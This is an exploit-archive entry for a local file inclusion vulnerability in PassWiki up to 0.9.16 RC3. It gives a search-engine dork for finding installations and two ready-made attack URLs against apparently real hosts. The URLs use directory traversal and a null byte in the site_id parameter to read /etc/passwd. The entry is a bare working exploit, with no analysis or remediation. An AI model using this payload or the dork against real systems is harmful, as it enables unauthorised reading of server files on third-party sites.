id: 3092
date: 05/30/2008
title: PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability
author: mozi
cves: 

===================================================================
PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability
===================================================================



dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #